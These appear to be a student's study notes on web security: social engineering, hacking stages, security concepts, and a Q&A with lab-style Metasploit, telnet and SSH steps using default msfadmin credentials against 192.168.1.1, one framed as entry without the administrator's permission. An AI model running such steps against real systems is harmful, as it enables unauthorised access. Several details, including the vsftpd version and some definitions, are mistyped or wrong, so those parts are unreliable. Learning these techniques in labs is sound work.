SUMMARY OF WEB SECURITY

[1] Social Engineering

 Social Engineering: - is a psycho-social attack that subverts human trust and helpfulness
in order to attain the attacker’s goals.

How does Social Engineering attack cycle works?

1. Information Gathering 3. Execution
2. Developing Relationship 4. Exploitation

Social Engineering: Basics to Success

- The 3 Critical Success Factors:
1. Trust
2. Satisfaction
3. Relationship

Technical vs. Non-Technical

Phishing  Impersonation/Pretexting
Vising  Dumpster Diving
Spam Mails  Spying and Eavesdropping
Popup Window  Support Staff
Interesting Software  Technical Expert

 Shoulder Surfing – refers to using direct observation techniques, such as looking over
someone’s shoulder, to get information.
 It is commonly used to obtain passwords, PINs, security codes and
similar data.
 Tail Gating/Piggy Backing – refers to when a person tags along with another person who is
authorized to gain entry into a restricted area, or pass a certain checkpoint.
o “Tailgating” implies without a consent while “Piggybacking” usually implies
consent of the authorized person.

 Dumpster Diving – is looking for treasure in someone else’s trash. (A Dumpster is a large
trash container).
 [2] Hacking Process

1. Footprinting
 Footprinting - refers to gathering all useful information about the target.
 Tools for Footprinting:
 WhoIs, Ping
 NS Lookup, Tracert
 IP Lookup

2. Scanning & Enumeration

 Steps: Check for live systems  Check for Open Ports  Identify Service  Banner
Grabbing  Scan for Vulnerability  Draw Network Diagrams of the Vulnerable Hosts
 ATTACK!!
 Tools for Scanning & Enumeration:
 Nmap  Netcat, tcpdump
 Nessus  Telnet, firewalk

3. Gaining Access
 Password Attacks
 Social Engineering
 Viruses

4. Maintaining Access & Clearing Tracks

 OS Backdoors
 Trojans
 Clearing tracks
What are Various Qualities a Hacker Should possess?
Good Coder
Well knowledgeable person of both Hardware as well as Software
Should have knowledge on Security System
Trusted Person

[3] Security Testing

 Security Testing: - is a process to determine that information system protects data and
maintains functionality.

Purpose of Security Testing?

 Primary purpose of security testing is to identify the vulnerabilities and subsequently
repairing them.

Sex Basic Security Concepts

1. Confidentiality – is more secret safe?
2. Integrity – is my data tampered?
3. Authentication – who am I?
4. Authorization – what can I do?
5. Availability – can I access it?
6. Non-repudiation – origin occurs

What is Cryptography?
 Cryptography: - is the process of hiding or coding information so that only the person a
message was intended for can read it.

[4] Hacking Web Server

How web servers work?
 Web servers use Hypertext Transfer Protocol (HTTP) and Hypertext Transfer
Protocol Secure (HTTPS) to allow web-based clients to connect to them and view and
download files.
 Hypertext Markup Language (HTML) is the language used to create web pages and
allows those pages to be rendered in web browser software on web clients.

Types of web server vulnerabilities:

1. Misconfiguration of the Web Server Software
2. Vulnerable Default Installation
3. OS or Application Bruges
Q&A
1. Explain the use of vulnerability scanners?
Answer: to scan vulnerability or weaknesses of a system.

2. If you find that port 20/21 is open and vstpd v 3.4 is running how you will hack that
server?
Answer: port 20/21 FTP
 To know service version: nmap –sV 192.168.1.1
 Msfconsole
 Search vsftp
 Copy name (Shift + Ctrl + C)
 To use: use [here] paste the name (Shift + Ctrl + V)
 Show payloads
 Copy the payload’s name
 Set payload [here] paste the name
 Show options
 Set RHOST 192.168.1.1
 Exploit
 COMPELETED…
 To check: whoami

3. Explain the use of Nmap tool?

Answer: is to know which ports are open or closed.

4. Explain the use of burp suite tool?

Answer: performing security testing of web applications.

5. Explain the use of msf console?

Answer: provides a command line interface to access & work with the Metasploit Framework.

6. If you find that port 23 is open how you will enter that server?
Answer: port 23 Telnet
 telnet 192.168.1.1  COMPLETED…
 login: msfadmin  To check: whoami
 password: msfadmin
7. If your find that port 22 is open list the steps that you will follow to use that server
without the permission of the administrator?
Answer: port 22 SSH
 ssh msfadmin@192.168.1.1
 password: msfadmin
 COMPLETED…
 To check: whoami

8. Explain the use of Cryptography?

Answer: to protect their privacy and keep their conversations and data confidential.

9. SSH @192.168.1.1 is it correct?

Answer: False